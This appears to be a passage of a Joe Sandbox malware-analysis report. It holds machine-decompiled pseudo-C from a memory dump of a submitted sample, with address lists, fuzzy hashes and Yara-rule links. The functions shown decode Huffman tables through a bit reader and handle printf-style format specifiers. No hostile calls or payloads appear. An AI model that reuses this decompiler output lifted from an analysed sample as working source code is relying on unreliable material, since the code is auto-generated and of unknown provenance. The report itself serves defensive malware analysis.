							 *(_t201 + 0x14) = E00BAA73B(_t184) >> 0x0000000c & 0x000000ff;
							E00BAA724(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E00BAA73B(_t184) >> 0x0000000c & 0x000000ff;
							E00BAA724(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00BB2FE6();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E00BAA740(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E00BAA73B(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E00BAA73B(_t157) >> 0xd) + 3;
													_push(3);
												}
												E00BAA724(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E00BAA73B(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00BAA73B(_t166) >> 0xd) + 3;
												_push(3);
											}
											E00BAA724(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00BB46DC(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00BB2FE6();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00BB2FE6();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00BB2FE6();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00BB2FE6();
							E00BBF300(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00BB27BB(_t178, _t205);
				}
				_t135 = E00BB46DC(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}

0x00bb39ac
0x00bb39b3
0x00bb39bc
0x00bb39c4
0x00bb39d3
0x00bb39de
0x00bb39e5
0x00bb39ea
0x00bb39ef
0x00bb3a14
0x00bb3a16
0x00bb3a1c
0x00bb3a22
0x00bb3a28
0x00bb3a2d
0x00bb3a3c
0x00bb3a41
0x00bb3a41
0x00bb3a48
0x00bb3a4e
0x00bb3a5f
0x00bb3a63
0x00bb3a68
0x00bb3a6c
0x00bb3a6f
0x00bb3aa8
0x00000000
0x00bb3aa8
0x00bb3a7f
0x00bb3a82
0x00bb3a87
0x00bb3a89
0x00bb3a92
0x00bb3a92
0x00bb3a95
0x00bb3a95
0x00bb3a96
0x00bb3a99
0x00000000
0x00000000
0x00bb3a9b
0x00bb3aa0
0x00bb3aa1
0x00bb3aa3
0x00000000
0x00000000
0x00000000
0x00bb3aa3
0x00bb3aa5
0x00000000
0x00bb3aa5
0x00bb3a8b
0x00bb3aac
0x00bb3aac
0x00bb3aad
0x00bb3aad
0x00bb3ab2
0x00bb3ab4
0x00bb3abc
0x00bb3ac1
0x00bb3ac2
0x00bb3ac7
0x00bb3ac7
0x00bb3ac9
0x00bb3ad2
0x00bb3ad4
0x00bb3ae5
0x00bb3ae7
0x00bb3aee
0x00bb3af4
0x00bb3afa
0x00bb3afe
0x00bb3b2b
0x00bb3b2c
0x00bb3b2d
0x00bb3b31
0x00bb3b33
0x00bb3b51
0x00bb3b54
0x00bb3b60
0x00bb3b62
0x00bb3b66
0x00bb3b6b
0x00bb3b78
0x00bb3b7a
0x00bb3b7d
0x00bb3b7f
0x00bb3b7f
0x00bb3b81
0x00bb3b89
0x00bb3b89
0x00bb3b8c
0x00bb3ba3
0x00bb3ba6
0x00bb3bf2
0x00bb3bf4
0x00bb3c11
0x00bb3c11
0x00bb3c14
0x00bb3bf6
0x00bb3c00
0x00bb3c03
0x00bb3c03
0x00bb3c18
0x00bb3c1d
0x00bb3c1d
0x00bb3c1e
0x00bb3c24
0x00000000
0x00000000
0x00bb3c26
0x00bb3c2b
0x00bb3c2c
0x00bb3c2e
0x00000000
0x00000000
0x00bb3c30
0x00bb3c30
0x00000000
0x00bb3c30
0x00000000
0x00bb3c1d
0x00bb3ba8
0x00bb3bab
0x00bb3bad
0x00bb3bca
0x00bb3bca
0x00bb3bcd
0x00bb3baf
0x00bb3bb9
0x00bb3bbc
0x00bb3bbc
0x00bb3bd1
0x00bb3bd6
0x00bb3bd8
0x00bb3c53
0x00bb3c53
0x00bb3cd2
0x00000000
0x00bb3bda
0x00bb3bda
0x00bb3bda
0x00bb3bdb
0x00bb3be1
0x00000000
0x00000000
0x00bb3be7
0x00bb3beb
0x00bb3bec
0x00bb3bee
0x00000000
0x00000000
0x00000000
0x00bb3bf0
0x00000000
0x00bb3bda
0x00bb3bd8
0x00bb3b99
0x00bb3b9d
0x00000000
0x00bb3b9d
0x00bb3b3c
0x00bb3b3c
0x00bb3b3e
0x00bb3b3e
0x00bb3b40
0x00000000
0x00000000
0x00bb3b42
0x00bb3b43
0x00bb3b46
0x00bb3b49
0x00000000
0x00000000
0x00000000
0x00bb3b4b
0x00bb3b4d
0x00000000
0x00bb3b4d
0x00bb3b02
0x00bb3b05
0x00bb3b0f
0x00bb3b17
0x00bb3b1c
0x00bb3b1f
0x00000000
0x00bb3b1f
0x00bb3ad8
0x00bb3add
0x00bb3adf
0x00000000
0x00000000
0x00000000
0x00bb3c36
0x00bb3c36
0x00bb3c36
0x00bb3c42
0x00bb3c44
0x00bb3c4b
0x00bb3c51
0x00bb3c57
0x00bb3c64
0x00bb3c69
0x00bb3c6a
0x00bb3c6f
0x00bb3c79
0x00bb3c81
0x00bb3c82
0x00bb3c87
0x00bb3c91
0x00bb3c99
0x00bb3c9a
0x00bb3c9f
0x00bb3ca9
0x00bb3cb1
0x00bb3cb2
0x00bb3cc8
0x00bb3cd0
0x00000000
0x00bb3cd0
0x00000000
0x00bb3c51
0x00bb39f7
0x00bb3a01
0x00bb3a02
0x00000000
0x00bb3a09
0x00bb39c6
0x00bb39cd
0x00000000
0x00000000
0x00bb3cdc

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66462eb08bd74f8c30c79f1e955b78a3e9fbc8ee5d976a6d57d0dc80841f2e89
Instruction ID: eeb030beef17acd612f1d9aaa491db80c34caf76c0f4af86907dea309d52286e
Opcode Fuzzy Hash: 66462eb08bd74f8c30c79f1e955b78a3e9fbc8ee5d976a6d57d0dc80841f2e89
Instruction Fuzzy Hash: 379168B12087498BDB24EF64D8D1BFE77D5EB90700F1009ADE59787282EBB4DA44C752

Uniqueness

Uniqueness Score: -1.00%

Function 00BC47A9 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 83%

			E00BC47A9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0xbdd668; // 0xb57946a0
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00BC51DB(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E00BBEA8A(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00BC3A70(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E00BC54F6(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00BC3A70(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E00BC53D8(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00BC3A70(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00BC4F73(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00BC5150(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00BC4CD9(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00BC50BD(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00BC5131(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00BC4B1C(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00BC4EDB(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00bc47a9
0x00bc47b1
0x00bc47b8
0x00bc47bd
0x00bc47bf
0x00bc47c3
0x00bc47c6
0x00bc47ca
0x00bc47cb
0x00bc47ce
0x00bc483b
0x00bc483e
0x00bc488d
0x00bc488d
0x00bc4890
0x00bc47fc
0x00bc47fe
0x00bc4803
0x00bc4805
0x00bc48ab
0x00bc48ae
0x00bc49f4
0x00bc49f6
0x00bc4a05
0x00bc4a05
0x00bc48b4
0x00bc48b9
0x00bc48bc
0x00bc48bf
0x00bc48c3
0x00bc48c9
0x00bc48ca
0x00bc48cc
0x00bc48f6
0x00bc48f6
0x00bc48fa
0x00bc48fd
0x00bc4907
0x00bc4909
0x00bc490c
0x00bc490e
0x00bc4914
0x00bc4914
0x00bc4916
0x00bc4916
0x00bc4919
0x00bc4927
0x00bc4927
0x00bc4929
0x00bc492b
0x00bc492c
0x00bc492e
0x00bc4934
0x00bc4936
0x00bc4937
0x00bc493c
0x00bc493f
0x00bc494d
0x00bc494d
0x00bc494f
0x00bc494f
0x00bc495a
0x00bc495c
0x00bc4961
0x00bc4961
0x00bc4964
0x00bc496a
0x00bc496c
0x00bc496f
0x00bc497f
0x00bc4984
0x00bc4984
0x00bc4999
0x00bc499e
0x00bc49a1
0x00bc49a6
0x00bc49a9
0x00bc49ab
0x00bc49ad
0x00bc49b0
0x00bc49b3
0x00bc49c0
0x00bc49c5
0x00bc49c5
0x00bc49b3
0x00bc49cc
0x00bc49d1
0x00bc49d4
0x00bc49d9
0x00bc49dc
0x00bc49de
0x00bc49eb
0x00bc49f0
0x00bc49de
0x00000000
0x00bc49f3
0x00bc4943
0x00bc4944
0x00bc4947
0x00000000
0x00000000
0x00bc4949
0x00000000
0x00bc4949
0x00bc4930
0x00bc4932
0x00000000
0x00000000
0x00000000
0x00bc4932
0x00bc491d
0x00bc491e
0x00bc4921
0x00000000
0x00000000
0x00bc4923
0x00000000
0x00bc4923
0x00000000
0x00bc4910
0x00bc4901
0x00bc4902
0x00bc4905
0x00000000
0x00000000
0x00000000
0x00bc4905
0x00bc48d0
0x00bc48d3
0x00bc48d5
0x00bc48e0
0x00bc48e2
0x00bc48ea
0x00bc48ec
0x00bc48ee
0x00000000
0x00000000
0x00bc48f0
0x00bc48f4
0x00bc48f4
0x00000000
0x00bc48f4
0x00bc48e4
0x00bc48d9
0x00bc48d9
0x00bc48da
0x00000000
0x00bc48da
0x00bc48d7
0x00000000
0x00bc48d7
0x00bc480b
0x00000000
0x00bc480b
0x00bc4897
0x00bc4897
0x00bc489a
0x00bc486c
0x00bc486c
0x00bc486d
0x00bc486f
0x00bc4871
0x00000000
0x00bc4871
0x00bc489c
0x00bc489f
0x00000000
0x00000000
0x00bc48a5
0x00bc4814
0x00bc4814
0x00000000
0x00bc4814
0x00bc4840
0x00bc4883
0x00000000
0x00bc4883
0x00bc4842
0x00bc4845
0x00bc4878
0x00bc487a
0x00000000
0x00bc487a
0x00bc4847
0x00bc484a
0x00bc4868
0x00bc4868
0x00bc4868
0x00bc4868
0x00000000
0x00bc4868
0x00bc484c
0x00bc484f
0x00bc4861
0x00000000
0x00bc4861
0x00bc4851
0x00bc4854
0x00000000
0x00000000
0x00bc4858
0x00000000
0x00bc4858
0x00bc47d0
0x00000000
0x00000000
0x00bc47d6
0x00bc47d8
0x00bc4818
0x00bc4818
0x00bc481b
0x00bc4834
0x00000000
0x00bc4834
0x00bc481d
0x00bc481d
0x00bc4820
0x00000000
0x00000000
0x00bc4823
0x00bc4826
0x00000000
0x00000000
0x00bc4828
0x00bc482b
0x00000000
0x00bc482b
0x00bc47da
0x00bc4812
0x00000000
0x00bc4812
0x00bc47de
0x00000000
0x00000000
0x00bc47e7
0x00000000
0x00000000
0x00bc47ec
0x00000000
0x00000000
0x00bc47f1
0x00000000
0x00000000
0x00bc47fa
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621ee3aae1caef3d50d18332f5a44a0123078613691ff7d2074e8e3d3cb22f1c
Instruction ID: 59115d2d92f4cd971f20dd5e7f9a3d0e874ef8b7634dca2758fb427edc007935
Opcode Fuzzy Hash: 621ee3aae1caef3d50d18332f5a44a0123078613691ff7d2074e8e3d3cb22f1c
Instruction Fuzzy Hash: 94617971A007996ADE389A6888F1FBF23D4DB42700F5006DEE983DB181D7A1DF42C355

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3CDD Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00BB3CDD(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E00BAA73B(_t168) >> 0x0000000c & 0x000000ff;
							E00BAA724(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E00BAA73B(_t168) >> 0x0000000c & 0x000000ff;
							E00BAA724(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00BB2FE6();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E00BAA740(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E00BAA73B(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E00BAA73B(_t139) >> 0xd) + 3;
													_push(3);
												}
												E00BAA724(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E00BAA73B(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E00BAA73B(_t139) >> 0xd) + 3;
												_push(3);
											}
											E00BAA724(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
